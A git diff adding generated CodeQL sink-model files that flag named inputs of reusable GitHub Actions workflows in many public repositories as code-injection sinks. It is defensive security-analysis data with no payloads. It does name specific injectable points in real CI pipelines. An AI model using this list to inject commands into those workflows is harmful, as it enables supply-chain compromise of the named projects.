b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml new file mode 100644 index 000000000000..f18d1e4c50ab --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_mobile-ci-cd.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-email", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.git-user-name", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.track", "code-injection", "generated"] + - ["bbq-beets/mobile-ci-cd/.github/workflows/mobile-ci-cd.yml", "*", "inputs.package-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml new file mode 100644 index 000000000000..21db2585a5e8 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bbq-beets_yujincat-action.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.shell", "code-injection", "generated"] + - ["bbq-beets/yujincat-action/.github/workflows/test-referInputs.yml", "*", "inputs.environment", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml new file mode 100644 index 000000000000..3f263608c21b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bdunderscore_modular-avatar.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bdunderscore/modular-avatar/.github/workflows/build-test-docs.yml", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml new file mode 100644 index 000000000000..017d0bc89f53 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/benc-uk_workflow-dispatch.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["benc-uk/workflow-dispatch/.github/workflows/echo-3.yaml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml new file mode 100644 index 000000000000..1a38d6b35ade --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bridgecrewio_checkov.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.REGISTRY", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_NAME", "code-injection", "generated"] + - ["bridgecrewio/checkov/tests/github_actions/resources/.github/workflows/docker-slsa.yaml", "*", "inputs.IMAGE_TAG", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml new file mode 100644 index 000000000000..339d7b1dd0a2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bugsnag_bugsnag-ruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bugsnag/bugsnag-ruby/.github/workflows/run-maze-runner.yml", "*", "inputs.features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml new file mode 100644 index 000000000000..ff0f83454c2d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/bytecodealliance_wasm-micro-runtime.model.yml @@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.the_path", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.last_commit", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/reuse_latest_release_binaries.yml", "*", "inputs.binary_name_stem", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamrc.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_vscode_ext.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.config_file", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_sdk.yml", "*", "inputs.wamr_app_framework_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.ver_num", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.runner", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_wamr_lldb.yml", "*", "inputs.wasi_sdk_url", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.arch", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_llvm_libraries.yml", "*", "inputs.os", "code-injection", "generated"] + - ["bytecodealliance/wasm-micro-runtime/.github/workflows/build_iwasm_release.yml", "*", "inputs.ver_num", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml new file mode 100644 index 000000000000..c07d2aba0b6c --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/celo-org_celo-blockchain.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.destination-tag", "code-injection", "generated"] + - ["celo-org/celo-blockchain/.github/workflows/add-docker-tag.yaml", "*", "inputs.origin-tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml new file mode 100644 index 000000000000..77a7eaae309f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cemu-project_cemu.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cemu-project/cemu/.github/workflows/build.yml", "*", "inputs.experimentalversion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml new file mode 100644 index 000000000000..09299774b6a6 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cesiumgs_cesium-unreal.model.yml @@ -0,0 +1,29 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.unreal-engine-association", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.test-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/testPackageOnWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildiOS.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-generator", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-platform", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.cmake-toolchain", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.extra-choco-packages", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildWindows.yml", "*", "inputs.visual-studio-components", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.unreal-program-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildMac.yml", "*", "inputs.upload-package-base-name", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.unreal-engine-version", "code-injection", "generated"] + - ["cesiumgs/cesium-unreal/.github/workflows/buildLinux.yml", "*", "inputs.clang-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml new file mode 100644 index 000000000000..028210d4eac9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cgal_cgal.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cgal/cgal/.github/workflows/send_email.yml", "*", "inputs.message", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml new file mode 100644 index 000000000000..2ea83d9d94b9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/checkstyle_checkstyle.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["checkstyle/checkstyle/.github/workflows/release-upload-all-jar.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-xdoc-with-releasenotes.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-page.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-update-github-io.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-publish-releasenotes-twitter.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-new-milestone-and-issues-in-other-repos.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-prepare.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-maven-perform.yml", "*", "inputs.version", "code-injection", "generated"] + - ["checkstyle/checkstyle/.github/workflows/release-copy-github-io-to-sourceforge.yml", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml new file mode 100644 index 000000000000..69f1b740c968 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/chia-network_actions.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.docker-context", "code-injection", "generated"] + - ["chia-network/actions/.github/workflows/docker-build.yaml", "*", "inputs.image_subpath", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml new file mode 100644 index 000000000000..61af1d324413 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/chipsalliance_chisel.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.scala", "code-injection", "generated"] + - ["chipsalliance/chisel/.github/workflows/test.yml", "*", "inputs.circt", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml new file mode 100644 index 000000000000..1532fc723aa9 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/clickhouse_clickhouse.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_test.yml", "*", "inputs.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.test_name", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.run_command", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.working-directory", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_simple_job.yml", "*", "inputs.additional_envs", "code-injection", "generated"] + - ["clickhouse/clickhouse/.github/workflows/reusable_docker.yml", "*", "inputs.set_latest", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml new file mode 100644 index 000000000000..f4a7cd26183d --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cloudfoundry_cli.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cloudfoundry/cli/.github/workflows/tests-integration-reusable.yml", "*", "inputs.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml new file mode 100644 index 000000000000..119bfeaa7969 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cocotb_cocotb.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_sim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.nox_session_test_nosim", "code-injection", "generated"] + - ["cocotb/cocotb/.github/workflows/regression-tests.yml", "*", "inputs.group", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml new file mode 100644 index 000000000000..10ea343b7aab --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/codeigniter4_codeigniter4.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-serviceless-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.extra-composer-options", "code-injection", "generated"] + - ["codeigniter4/codeigniter4/.github/workflows/reusable-phpunit-test.yml", "*", "inputs.php-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml new file mode 100644 index 000000000000..6310b7155d32 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/com-lihaoyi_mill.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.millargs", "code-injection", "generated"] + - ["com-lihaoyi/mill/.github/workflows/run-mill-action.yml", "*", "inputs.buildcmd", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml new file mode 100644 index 000000000000..a1de7e9a8f93 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cosmos_ibc-go.model.yml @@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.upgrade-plan-name", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-upgrade-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-type", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.relayer-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-b-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-a-tag", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.chain-image", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-test-workflow-call.yml", "*", "inputs.test-entry-point", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-suite", "code-injection", "generated"] + - ["cosmos/ibc-go/.github/workflows/e2e-compatibility-workflow-call.yaml", "*", "inputs.test-file-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml new file mode 100644 index 000000000000..d6e334573e4b --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/crowdsecurity_crowdsec.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.latest", "code-injection", "generated"] + - ["crowdsecurity/crowdsec/.github/workflows/publish-docker.yml", "*", "inputs.image_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml new file mode 100644 index 000000000000..eeff97a8aeac --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/cryptomator_cryptomator.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["cryptomator/cryptomator/.github/workflows/get-version.yml", "*", "inputs.version", "code-injection", "generated"] + - ["cryptomator/cryptomator/.github/workflows/av-whitelist.yml", "*", "inputs.url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml new file mode 100644 index 000000000000..34ffd6788b13 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/daeuniverse_dae.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.pr-number", "code-injection", "generated"] + - ["daeuniverse/dae/.github/workflows/seed-build.yml", "*", "inputs.build-type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml new file mode 100644 index 000000000000..8ee00d47f799 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dafny-lang_dafny.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/publish-release-reusable.yml", "*", "inputs.tag_name", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.all_platforms", "code-injection", "generated"] + - ["dafny-lang/dafny/.github/workflows/integration-tests-reusable.yml", "*", "inputs.num_shards", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml new file mode 100644 index 000000000000..40b35b5c8732 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dagger_dagger.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.mage-targets", "code-injection", "generated"] + - ["dagger/dagger/.github/workflows/_hack_make.yml", "*", "inputs.dev-engine", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml new file mode 100644 index 000000000000..c02368b5d51f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dash-industry-forum_dash.js.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.deploy_path", "code-injection", "generated"] + - ["dash-industry-forum/dash.js/.github/workflows/deploy.yml", "*", "inputs.envname", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml new file mode 100644 index 000000000000..61b3e84b29e2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-go.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-go/.github/workflows/smoke-tests.yml", "*", "inputs.go-libddwaf-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml new file mode 100644 index 000000000000..72e4a3eec658 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datadog_dd-trace-py.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datadog/dd-trace-py/.github/workflows/lib-inject-publish.yml", "*", "inputs.ddtrace-version", "code-injection", "generated"] + - ["datadog/dd-trace-py/.github/workflows/build-and-publish-image.yml", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml new file mode 100644 index 000000000000..5e8754427718 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/datafuselabs_databend.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.run_id", "code-injection", "generated"] + - ["datafuselabs/databend/.github/workflows/reuse.benchmark.yml", "*", "inputs.source_id", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml new file mode 100644 index 000000000000..991743df7d23 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-bigquery.model.yml @@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.s3_bucket_name", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.build_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.env_setup_script_path", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.sha", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.package_test_command", "code-injection", "generated"] + - ["dbt-labs/dbt-bigquery/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml new file mode 100644 index 000000000000..780d95fab47f --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-core.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.nightly_release", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.test_run", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.target_branch", "code-injection", "generated"] + - ["dbt-labs/dbt-core/.github/workflows/release.yml", "*", "inputs.version_number", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml new file mode 100644 index 000000000000..cf69379583d2 --- /dev/null +++ b/ql/lib/ext/generated/reusable-workflows/dbt-labs_dbt-snowflake.model.yml @@ -0,0 +1,14 